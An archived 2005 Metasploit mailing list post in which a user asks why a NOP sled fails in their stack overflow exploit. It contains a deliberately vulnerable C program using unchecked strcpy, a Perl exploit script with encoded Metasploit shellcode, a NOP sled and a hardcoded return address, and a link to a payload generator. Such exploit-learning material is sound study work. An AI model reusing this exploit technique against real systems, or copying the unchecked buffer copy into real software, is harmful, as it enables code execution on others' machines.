Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Nop sled problem

From: shellsangel at gmail.com (shells angel)
Date: Thu, 3 Nov 2005 14:29:31 +0100
Hi,

At the moment I'm trying to exploit a trivial stack overflow in the
following C program:

---stack_vuln1.c---
 - Hide quoted text -
#include <stdio.h>

void vuln(char *str)
{
char buff[128];
strcpy(buff, str);
printf("buff at %x contains: %s\n", buff, buff);
}

int main(int argc, char *argv[])
{
vuln(argv[1]);
return 0;
}
---end of stack_vuln1.c---

To exploit the program I've written this exploit in perl:
---exploit code---
#!/usr/bin/perl -w

use strict;

# linux_ia32_exec - CMD=ls Size=64 Encoder=PexFnstenvSub
http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xf6\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb4".
"\x96\x4d\x1d\x83\xeb\xfc\xe2\xf4\xde\x9d\x15\x84\xe6\xf0\x25\x30".
"\xd7\x1f\xaa\x75\x9b\xe5\x25\x1d\xdc\xb9\x2f\x74\xda\x1f\xae\x4f".
"\x5c\x95\x4d\x1d\xb4\xfa\x3e\x1d\xe3\xc5\xc4\xfc\x79\x16\x4d\x1d";

my $buffer_length = 128;
my $eip_offset = $buffer_length + 4;
my $nop_sled = "\x90" x ($eip_offset - length($shellcode));

my $ret = pack('i', 0xbffff938);
my $payload = $nop_sled . $shellcode . $ret . "\0";

exec './stack_vuln1', $payload;
---end of exploit code---

As you can see, I borrowed the shellcode from the metasploit framework. This
shellcode is located at this url:

http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x813862cc%29&MODULE=linux_ia32_exec&MODE=GENERATE&OPT_CMD=ls&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload


The problem I'm experiencing is somehow related to the nop sled. Whenever I
change the line:

my $payload = $nop_sled . $shellcode . $ret . "\0";

to:

my $payload = $shellcode . $nop_sled . $ret . "\0";

the shellcode will get executed correctly. But as for as I understand, this
renders the entire nop sled useless because the RET address will jump
directly to the beginning of the shellcode. Otherwise(placing the shellcode
behing the nop sled) the program crashes due to a Segmentation Fault. The
odd thing is that the nopsled will get executed along with a part of the
shellcode(checked it with GDB). Does anyone know what the the problem could
be?

Thanks in advance,

shellsangel
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20051103/3f5fe0f8/attachment.htm>
Previous By Date Next
Previous By Thread Next

Current thread: